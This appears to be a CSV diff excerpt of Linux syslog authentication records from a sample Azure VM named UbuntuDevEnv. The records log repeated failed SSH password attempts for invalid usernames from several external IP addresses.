+16606,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:19:29,UbuntuDevEnv,2019-06-26 07:19:29,auth,UbuntuDevEnv,info,Failed password for invalid user demo from 138.68.29.52 port 39940 ssh2,41770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demo,138.68.29.5,39940,,
+16607,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:19:29,UbuntuDevEnv,2019-06-26 07:19:29,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 39940:11: Bye Bye [preauth],41770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,39940,,
+16608,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:19:29,UbuntuDevEnv,2019-06-26 07:19:29,auth,UbuntuDevEnv,info,Disconnected from invalid user demo 138.68.29.52 port 39940 [preauth],41770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demo,138.68.29.5,39940,,
+16609,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:19:38,UbuntuDevEnv,2019-06-26 07:19:38,auth,UbuntuDevEnv,info,Invalid user serverpilot from 206.189.118.156 port 58996,41814,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,serverpilot,206.189.118.1,58996,,
+16610,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:19:38,UbuntuDevEnv,2019-06-26 07:19:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.118.156,41814,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,206.189.118.1,,0,
+16611,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:19:38,UbuntuDevEnv,2019-06-26 07:19:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41814,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16612,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:19:40,UbuntuDevEnv,2019-06-26 07:19:39,auth,UbuntuDevEnv,info,Failed password for invalid user serverpilot from 206.189.118.156 port 58996 ssh2,41814,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,serverpilot,206.189.118.1,58996,,
+16613,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:19:40,UbuntuDevEnv,2019-06-26 07:19:39,auth,UbuntuDevEnv,info,Received disconnect from 206.189.118.156 port 58996:11: Bye Bye [preauth],41814,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.118.1,58996,,
+16614,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:19:40,UbuntuDevEnv,2019-06-26 07:19:39,auth,UbuntuDevEnv,info,Disconnected from invalid user serverpilot 206.189.118.156 port 58996 [preauth],41814,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,serverpilot,206.189.118.1,58996,,
+16615,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:19:44,UbuntuDevEnv,2019-06-26 07:19:44,auth,UbuntuDevEnv,info,Invalid user ubuntu from 64.202.187.152 port 47582,41832,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,64.202.187.1,47582,,
+16616,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:19:44,UbuntuDevEnv,2019-06-26 07:19:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41832,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16617,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:19:44,UbuntuDevEnv,2019-06-26 07:19:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=64.202.187.152,41832,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,64.202.187.1,,0,
+16618,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:19:47,UbuntuDevEnv,2019-06-26 07:19:46,auth,UbuntuDevEnv,info,Failed password for invalid user ubuntu from 64.202.187.152 port 47582 ssh2,41832,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,64.202.187.1,47582,,
+16619,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:19:47,UbuntuDevEnv,2019-06-26 07:19:46,auth,UbuntuDevEnv,info,Disconnected from invalid user ubuntu 64.202.187.152 port 47582 [preauth],41832,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,64.202.187.1,47582,,
+16620,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:19:47,UbuntuDevEnv,2019-06-26 07:19:46,auth,UbuntuDevEnv,info,Received disconnect from 64.202.187.152 port 47582:11: Bye Bye [preauth],41832,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,64.202.187.1,47582,,
+16621,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:20:12,UbuntuDevEnv,2019-06-26 07:20:12,auth,UbuntuDevEnv,info,Invalid user mom from 87.101.240.10 port 53784,41936,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mom,87.101.240.1,53784,,
+16622,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:20:12,UbuntuDevEnv,2019-06-26 07:20:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=87.101.240.10,41936,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,87.101.240.1,,0,
+16623,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:20:12,UbuntuDevEnv,2019-06-26 07:20:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41936,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16624,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:20:14,UbuntuDevEnv,2019-06-26 07:20:14,auth,UbuntuDevEnv,info,Failed password for invalid user mom from 87.101.240.10 port 53784 ssh2,41936,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mom,87.101.240.1,53784,,
+16625,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:20:14,UbuntuDevEnv,2019-06-26 07:20:14,auth,UbuntuDevEnv,info,Received disconnect from 87.101.240.10 port 53784:11: Bye Bye [preauth],41936,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,87.101.240.1,53784,,
+16626,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:20:14,UbuntuDevEnv,2019-06-26 07:20:14,auth,UbuntuDevEnv,info,Disconnected from invalid user mom 87.101.240.10 port 53784 [preauth],41936,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mom,87.101.240.1,53784,,
+16627,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:20:59,UbuntuDevEnv,2019-06-26 07:20:58,auth,UbuntuDevEnv,info,Invalid user yusuf from 138.68.29.52 port 57258,42100,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yusuf,138.68.29.5,57258,,
+16628,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:20:59,UbuntuDevEnv,2019-06-26 07:20:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,42100,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
+16629,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:20:59,UbuntuDevEnv,2019-06-26 07:20:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42100,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16630,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:21:02,UbuntuDevEnv,2019-06-26 07:21:01,auth,UbuntuDevEnv,info,Failed password for invalid user yusuf from 138.68.29.52 port 57258 ssh2,42100,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yusuf,138.68.29.5,57258,,
+16631,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:21:02,UbuntuDevEnv,2019-06-26 07:21:01,auth,UbuntuDevEnv,info,Disconnected from invalid user yusuf 138.68.29.52 port 57258 [preauth],42100,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yusuf,138.68.29.5,57258,,
+16632,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:21:02,UbuntuDevEnv,2019-06-26 07:21:01,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 57258:11: Bye Bye [preauth],42100,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,57258,,
+16633,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:21:13,UbuntuDevEnv,2019-06-26 07:21:13,auth,UbuntuDevEnv,info,Invalid user suessan from 206.189.118.156 port 48218,42156,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,suessan,206.189.118.1,48218,,
+16634,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:21:13,UbuntuDevEnv,2019-06-26 07:21:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.118.156,42156,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,206.189.118.1,,0,
+16635,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:21:13,UbuntuDevEnv,2019-06-26 07:21:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42156,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16636,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:21:15,UbuntuDevEnv,2019-06-26 07:21:15,auth,UbuntuDevEnv,info,Failed password for invalid user suessan from 206.189.118.156 port 48218 ssh2,42156,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,suessan,206.189.118.1,48218,,
+16637,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:21:15,UbuntuDevEnv,2019-06-26 07:21:15,auth,UbuntuDevEnv,info,Received disconnect from 206.189.118.156 port 48218:11: Bye Bye [preauth],42156,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.118.1,48218,,
+16638,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:21:15,UbuntuDevEnv,2019-06-26 07:21:15,auth,UbuntuDevEnv,info,Disconnected from invalid user suessan 206.189.118.156 port 48218 [preauth],42156,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,suessan,206.189.118.1,48218,,
+16639,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:21:19,UbuntuDevEnv,2019-06-26 07:21:18,auth,UbuntuDevEnv,info,Invalid user vyatta from 64.202.187.152 port 36784,42181,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vyatta,64.202.187.1,36784,,
+16640,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:21:19,UbuntuDevEnv,2019-06-26 07:21:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42181,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16641,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:21:19,UbuntuDevEnv,2019-06-26 07:21:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=64.202.187.152,42181,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,64.202.187.1,,0,
+16642,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:21:21,UbuntuDevEnv,2019-06-26 07:21:20,auth,UbuntuDevEnv,info,Failed password for invalid user vyatta from 64.202.187.152 port 36784 ssh2,42181,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vyatta,64.202.187.1,36784,,
+16643,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:21:21,UbuntuDevEnv,2019-06-26 07:21:20,auth,UbuntuDevEnv,info,Received disconnect from 64.202.187.152 port 36784:11: Bye Bye [preauth],42181,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,64.202.187.1,36784,,
+16644,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:21:21,UbuntuDevEnv,2019-06-26 07:21:20,auth,UbuntuDevEnv,info,Disconnected from invalid user vyatta 64.202.187.152 port 36784 [preauth],42181,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vyatta,64.202.187.1,36784,,
+16645,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:21:27,UbuntuDevEnv,2019-06-26 07:21:27,auth,UbuntuDevEnv,info,Invalid user co from 46.101.149.230 port 45260,42211,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,co,46.101.149.2,45260,,
+16646,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:21:27,UbuntuDevEnv,2019-06-26 07:21:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42211,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16647,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:21:27,UbuntuDevEnv,2019-06-26 07:21:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.149.230,42211,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,46.101.149.2,,0,
+16648,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:21:30,UbuntuDevEnv,2019-06-26 07:21:29,auth,UbuntuDevEnv,info,Failed password for invalid user co from 46.101.149.230 port 45260 ssh2,42211,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,co,46.101.149.2,45260,,
+16649,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:21:30,UbuntuDevEnv,2019-06-26 07:21:29,auth,UbuntuDevEnv,info,Received disconnect from 46.101.149.230 port 45260:11: Bye Bye [preauth],42211,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,45260,,
+16650,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:21:30,UbuntuDevEnv,2019-06-26 07:21:29,auth,UbuntuDevEnv,info,Disconnected from invalid user co 46.101.149.230 port 45260 [preauth],42211,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,co,46.101.149.2,45260,,
+16651,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:22:17,UbuntuDevEnv,2019-06-26 07:22:17,auth,UbuntuDevEnv,info,Invalid user himanshu from 87.101.240.10 port 42802,42381,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,himanshu,87.101.240.1,42802,,
+16652,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:22:17,UbuntuDevEnv,2019-06-26 07:22:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=87.101.240.10,42381,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,87.101.240.1,,0,
+16653,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:22:17,UbuntuDevEnv,2019-06-26 07:22:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42381,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16654,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:22:20,UbuntuDevEnv,2019-06-26 07:22:19,auth,UbuntuDevEnv,info,Failed password for invalid user himanshu from 87.101.240.10 port 42802 ssh2,42381,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,himanshu,87.101.240.1,42802,,
+16655,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:22:20,UbuntuDevEnv,2019-06-26 07:22:20,auth,UbuntuDevEnv,info,Received disconnect from 87.101.240.10 port 42802:11: Bye Bye [preauth],42381,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,87.101.240.1,42802,,
+16656,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:22:20,UbuntuDevEnv,2019-06-26 07:22:20,auth,UbuntuDevEnv,info,Disconnected from invalid user himanshu 87.101.240.10 port 42802 [preauth],42381,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,himanshu,87.101.240.1,42802,,
+16657,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:22:32,UbuntuDevEnv,2019-06-26 07:22:31,auth,UbuntuDevEnv,info,Invalid user user from 138.68.29.52 port 46352,42440,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,138.68.29.5,46352,,
+16658,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:22:32,UbuntuDevEnv,2019-06-26 07:22:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,42440,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
+16659,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:22:32,UbuntuDevEnv,2019-06-26 07:22:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42440,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16660,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:22:34,UbuntuDevEnv,2019-06-26 07:22:33,auth,UbuntuDevEnv,info,Failed password for invalid user user from 138.68.29.52 port 46352 ssh2,42440,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,138.68.29.5,46352,,
+16661,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:22:34,UbuntuDevEnv,2019-06-26 07:22:34,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 46352:11: Bye Bye [preauth],42440,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,46352,,
+16662,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:22:34,UbuntuDevEnv,2019-06-26 07:22:34,auth,UbuntuDevEnv,info,Disconnected from invalid user user 138.68.29.52 port 46352 [preauth],42440,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,138.68.29.5,46352,,
+16663,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:22:45,UbuntuDevEnv,2019-06-26 07:22:44,auth,UbuntuDevEnv,info,Invalid user mie from 206.189.118.156 port 37436,42482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mie,206.189.118.1,37436,,
+16664,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:22:45,UbuntuDevEnv,2019-06-26 07:22:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16665,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:22:45,UbuntuDevEnv,2019-06-26 07:22:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.118.156,42482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,206.189.118.1,,0,
